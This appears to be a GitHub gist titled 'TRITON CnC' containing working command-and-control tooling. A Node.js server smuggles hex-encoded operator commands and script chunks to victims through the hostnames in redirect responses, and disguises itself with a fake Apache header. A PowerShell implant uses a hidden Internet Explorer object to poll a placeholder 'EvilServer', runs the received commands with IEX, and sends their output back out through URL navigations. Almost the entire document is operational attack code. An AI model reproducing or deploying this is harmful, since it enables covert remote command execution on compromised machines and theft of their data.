Skip to content

Instantly share code, notes, and snippets.

@ssherei
Created April 5, 2017 15:52
Show Gist options
  • Save ssherei/0504fb041f8e4c0f4b7f3854481fdfcf to your computer and use it in GitHub Desktop.
Save ssherei/0504fb041f8e4c0f4b7f3854481fdfcf to your computer and use it in GitHub Desktop.
TRITON CnC
var http = require('http');
var readline = require('readline');
var fs = require('fs');
var command = 'Nocmd';
const PORT=8000;
var count = 0;
var filebuf;
const split = 20;
var remainder;
var repeat;
var filelength;
var chunkcount= 0;
var filecmd = 0;
var log = fs.createWriteStream('log.txt', {'flags': 'a'});
function handleRequest(request, response){
if (count == 0) {
console.log('\r\nrecieved Connection from : ' + request.connection.remoteAddress + '\r\n');
rl.setPrompt('CnC-'+request.connection.remoteAddress+' > ');
}
count = count +1;
if (request.url == '/') {
if (command.indexOf('Invoke-Script') > -1) {
filecmd = 1;
chunkcount = 0;
var file = command.split(' ')[1];
filebuf = fs.readFileSync(file);
length = filebuf.length;
repeat = Math.floor(length/split);
remainder = length % split;
var total;
if(remainder) {
total = repeat + 1;
}
else {
total = repeat;
}
buf = new Buffer('chunk-'+total);
}
else {
buf = new Buffer(command, 'utf8');
}
cmd = buf.toString('hex');
response.writeHead(302,'Found',{Location: 'http://'+cmd+'.c/',
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Server': 'Apache/2.4.18 (Debian) mod_python/3.3.1 Python/2.7.11+ OpenSSL/1.0.2g mod_perl/2.0.9 Perl/v5.22.1',
}
);
response.end();
command = 'Nocmd';
}
else if (request.url == '/getchunk'){
buf = filebuf.slice(chunkcount*split,chunkcount*split+split);
cmd = buf.toString('hex');
console.log(cmd);
chunkcount = chunkcount + 1;
response.writeHead(302,'Found',{Location: 'http://'+cmd+'.c/',
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Server': 'Apache/2.4.18 (Debian) mod_python/3.3.1 Python/2.7.11+ OpenSSL/1.0.2g mod_perl/2.0.9 Perl/v5.22.1',
}
);
response.end();
command = 'Nocmd';
}
else {
filecmd = 0;
response.writeHead(302,'Found',{Location: 'http://Nocmd.c/',
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Server': 'Apache/2.4.18 (Debian) mod_python/3.3.1 Python/2.7.11+ OpenSSL/1.0.2g mod_perl/2.0.9 Perl/v5.22.1',
}
);
response.end();
log.write('\r\n'+decodeURI(request.url)+'\r\n');
console.log('\r\n'+decodeURI(request.url)+'\r\n');
}
}
var server = http.createServer(handleRequest);
server.listen(PORT, function(){
//Callback triggered when server is successfully listening. Hurray!
//console.log("Server listening on: http://localhost:%s", PORT);
});
var rl = readline.createInterface(process.stdin, process.stdout);
rl.setPrompt('CnC> ');
rl.prompt();
rl.on('line', function(line) {
if (line === "quit") rl.close();
command = line;
rl.prompt();
}).on('close',function(){
log.end('end');
process.exit(0);
});
$IE=new-object -com internetexplorer.application;
$IE.Silent;
$url = "EvilServer";
$w = IEX whoami;
function ExecCommand($command) {
$string = IEX $command 2>&1 | out-string;
write-host $string;
$len = $string.Length;
$split = 1500;
$repeat=[Math]::Floor($len/$split);
for($i=0;$i-lt$repeat;$i++){
$str = $string.Substring($i*$Split,$Split);
$IE.navigate($url+$w+'-'+$str);
Start-Sleep -s 1;
};
if($remainder=$len%$split){
$str = $string.Substring($len-$remainder);
$IE.navigate($url+$w+'-'+$str);
};
}
function decodeCommand($command) {
$command = $command -Split '\.';
$command = $command[0];
$cmd = for($i=0; $i -lt $command.Length;$i+=2) { [char][int]::Parse($command.substring($i,2),'HexNumber')};
$command = $cmd -join '';
return $command;
}
while ($true) {
$IE.navigate($url);
$command = $IE.Document.url -Split '/';
$command = $command[2];
$command = decodeCommand($command);
write-host $command;
if($command -Like'Nocmd') {
Start-Sleep -s 2;
continue;
}
elseif($command -like'chunk*'){
$c ='';
$command = $command -split '-';
$cnt = $command[1];
$IE.navigate($url+'getchunk');
for($i=0;$i -lt $cnt; $i++) {
Start-Sleep -s 1;
$IE.navigate($url+'getchunk');
$cmd = $IE.Document.url -Split '/';
$cmd = $cmd[2];
write-host $cmd;
$cmd = decodeCommand($cmd);
write-host $cmd;
$c = $c + $cmd
}
write-host $c;
ExecCommand($c);
}
else {
write-host 'Exec';
ExecCommand($command);
Start-Sleep -s 2;
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment